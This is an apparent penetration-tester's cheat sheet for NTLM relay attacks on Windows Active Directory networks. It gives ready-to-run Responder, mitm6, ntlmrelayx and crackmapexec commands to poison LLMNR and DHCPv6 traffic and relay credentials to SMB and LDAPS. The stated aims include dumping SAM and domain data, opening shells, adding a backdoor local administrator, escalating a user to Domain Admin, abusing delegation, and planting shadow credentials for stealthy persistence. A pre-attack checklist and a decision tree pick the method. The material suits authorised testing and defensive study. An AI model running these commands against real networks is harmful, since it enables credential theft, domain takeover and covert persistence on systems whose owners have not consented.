Relay Types at a Glance
| Method | Tools | Target | Best For |
|---|---|---|---|
| LLMNR Poison → SMB Relay | Responder + ntlmrelayx | SMB (445) | SAM dumps, shells, lateral movement on workstations |
| LLMNR Poison → LDAP Relay | Responder + ntlmrelayx | LDAP/LDAPS (389/636) | AD enumeration when mitm6 isn't viable |
| IPv6 DHCPv6 → LDAP Relay | mitm6 + ntlmrelayx | LDAPS (636) | AD object modification, domain compromise |
| IPv6 + IPv4 Combined | Responder + mitm6 + ntlmrelayx | SMB + LDAPS | Maximum coverage, noisy - use carefully |
Method 1 - LLMNR Poison → SMB Relay
Best for: Lateral movement, SAM dumps, shells on workstations where SMB signing is disabled
# Terminal 1 — poison only, SMB/HTTP off so ntlmrelayx handles auth
sudo responder -I <interface> -dw
# Terminal 2 — SAM dump (default)
impacket-ntlmrelayx -tf targets.txt -smb2support
# Terminal 2 — interactive shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i
nc 127.0.0.1 11000
# Terminal 2 — execute command
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
# Terminal 2 — create backdoor admin
impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user <username> <password> /add && net localgroup administrators <username> /add"Requires: SMB signing disabled on target, relayed user has local admin rights
Method 2 - LLMNR Poison → LDAP Relay
Best for: AD enumeration and object modification without mitm6 — useful when IPv6 is locked down
# Terminal 1 — poison only
sudo responder -I <interface> -dw
# Terminal 2 — relay to LDAP, dump AD
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldaps://<dc-ip> -l lootme
# Terminal 2 — escalate user to Domain Admin
impacket-ntlmrelayx -t ldaps://<dc-ip> --escalate-user <username>
# Terminal 2 — RBCD delegation
impacket-ntlmrelayx -t ldaps://<dc-ip> --add-computer <computer-name> --delegate-accessRequires: LDAP signing not enforced on DC, relayed user has sufficient LDAP write rights
Method 3 - IPv6 DHCPv6 → LDAP Relay (mitm6)
Best for: Domain compromise via AD object modification - most powerful relay chain, no SMB signing dependency
# Terminal 1 — spoof DHCPv6, become victim's DNS server
sudo mitm6 -d <domain.local>
# Terminal 2 — AD domain dump
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> -l lootme
# Terminal 2 — create machine account
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> -l lootme -smb2support --add-computer <computer-name>
# Terminal 2 — escalate user to Domain Admin
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> --escalate-user <username>
# Terminal 2 — RBCD delegation
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -wh fakewpad.<domain.local> --add-computer <computer-name> --delegate-access
# Terminal 2 — shadow credentials (stealthy persistence)
impacket-ntlmrelayx -6 -t ldaps://<dc-ip> -smb2support --shadow-credentials --no-dump --no-validate-privsRequires: IPv6 active on network, LDAP signing not enforced on DC
Method 4 - IPv6 + IPv4 Combined (Maximum Coverage)
Best for: Engagements where you want to maximise capture opportunity — catches both IPv4 and IPv6 auth simultaneously
# Responder config first — disable conflicting servers
sudo mousepad /etc/responder/Responder.conf
# Set: SMB = Off, HTTP = Off
# Terminal 1 — IPv4 LLMNR/NBT-NS poisoning only
sudo responder -I <interface> -dw
# Terminal 2 — IPv6 DHCPv6 spoofing
sudo mitm6 -d <domain.local>
# Terminal 3 — relay all incoming auth from both
impacket-ntlmrelayx -6 -tf targets.txt -t ldaps://<dc-ip> -wh fakewpad.<domain.local> -l lootme -smb2supportNoisier than running individually - use carefully on sensitive engagements
Pre-Attack Checklist
# Identify SMB signing status — build targets.txt for SMB relay
crackmapexec smb <subnet>/24 --gen-relay-list targets.txt
# Check LDAP signing status on DC
crackmapexec ldap <dc-ip> -u <username> -p <password> -M ldap-checker
# Check machine account quota — confirms --add-computer will work
crackmapexec ldap <dc-ip> -u <username> -p <password> -M MAQ
# Confirm IPv6 is active on the network
sudo tcpdump -i <interface> ip6 -nn
# Check WPAD DNS record — if no result, fake WPAD will be accepted
nslookup wpad.<domain.local> <dc-ip>Decision Tree
Are multiple machines active on the network?
└── No → Wait or use a different technique
└── Yes ↓
Is IPv6 active on the network?
├── Yes → Use Method 3 (mitm6 + LDAP relay) — most powerful
└── No ↓
Is SMB signing disabled on any hosts?
├── Yes → Use Method 1 (Responder + SMB relay)
└── No ↓
Is LDAP signing disabled on the DC?
├── Yes → Use Method 2 (Responder + LDAP relay)
└── No → Limited relay options — focus on hash cracking instead